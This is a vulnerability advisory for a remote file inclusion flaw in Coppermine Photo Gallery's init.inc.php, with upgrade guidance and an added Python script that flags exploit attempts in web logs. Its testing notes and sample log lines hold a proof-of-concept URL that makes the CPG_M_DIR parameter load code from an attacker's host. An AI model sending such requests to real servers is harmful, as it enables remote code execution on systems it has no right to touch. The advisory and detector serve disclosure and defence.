Coppermine Photo Gallery init.inc.php Remote File Inclusion

2004-04-29T00:00:00
ID OSVDB:5761
Type osvdb
Reporter Janek Vind "waraxe"(come2waraxe@yahoo.com)
Modified 2004-04-29T00:00:00

Description

Vulnerability Description

Coppermine Photo Gallery contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered by a specially crafted URL request to the init.inc.php script in which the CPG_M_DIR parameter names a malicious file on a remote system instead of a local module directory; the script includes the file from that URL. It is possible that the flaw may allow arbitrary code execution resulting in a loss of integrity.

Solution Description

Upgrade to version 1.3beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.


Manual Testing Notes

http://[victim]/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://[attacker]/include/functions.inc.php
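The request pattern above is easy to spot in web-server access logs. The following detector is an added example, not part of the OSVDB record or of Coppermine; it assumes Apache/nginx "combined" log format and runs over constructed sample lines using RFC 5737 documentation addresses. It decodes the CPG_M_DIR value repeatedly so that percent- and double-percent-encoded URLs are caught as well as the plain form shown in the testing notes.

```python
"""Flag Coppermine CPG_M_DIR remote-file-inclusion attempts in access logs (added example)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx "combined" format: client, ident, user, [timestamp], "request line", status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" \d{3}')

def decode_param(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%2568ttp -> http) are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_request(path):
    """Return {'path', 'value'} if CPG_M_DIR carries a URL (any scheme://), else None."""
    parts = urlsplit(path)
    params = parse_qs(parts.query, keep_blank_values=True)  # already decodes one level
    for name, values in params.items():
        if name.lower() != 'cpg_m_dir':
            continue
        for raw in values:
            value = decode_param(raw)
            # A legitimate module directory is a relative path; a stream-wrapper
            # prefix such as http:// or ftp:// means include() would fetch it remotely.
            if '://' in value:
                return {'path': parts.path, 'value': value}
    return None

def scan_log(lines):
    """Return (client_ip, script_path, decoded_CPG_M_DIR) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hit := classify_request(m['path'])):
            hits.append((m['ip'], hit['path'], hit['value']))
    return hits

# Constructed sample log lines (RFC 5737 addresses; not from the advisory or any real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Apr/2004:10:01:02 +0000] "GET /modules/coppermine/include/init.inc.php'
    '?CPG_M_DIR=http://198.51.100.9/include/functions.inc.php HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [29/Apr/2004:10:01:05 +0000] "GET /modules/coppermine/include/init.inc.php'
    '?CPG_M_DIR=%2568ttp%253A%252F%252F198.51.100.9%252Ffunctions.inc.php HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.20 - - [29/Apr/2004:10:02:00 +0000] "GET /modules/coppermine/include/init.inc.php'
    '?CPG_M_DIR=modules/coppermine HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
]
HITS = scan_log(SAMPLE_LOG)  # two hits: the plain and the double-encoded remote URL
```

The third sample line, a relative module directory, is the shape a legitimate CPG_M_DIR value takes and is not flagged.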

References:

Vendor URL: http://coppermine.sourceforge.net/
Vendor Specific Solution URL: http://nukephotogallery.com/index.php?name=Downloads&d_op=viewdownloaddetails&lid=39
Vendor Specific Advisory URL:
Security Tracker: 1010001
Secunia Advisory ID: 11524
Related OSVDB IDs: 5756, 5757, 5758, 5759, 5912, 6495, 6496, 6497, 6498, 6499, 6500
Other Advisory URL: http://www.waraxe.us/index.php?modname=sa&id=26
Keywords: waraxe-2004-SA#026, Remote File Inclusion
ISS X-Force ID: 16041
Bugtraq ID: 10253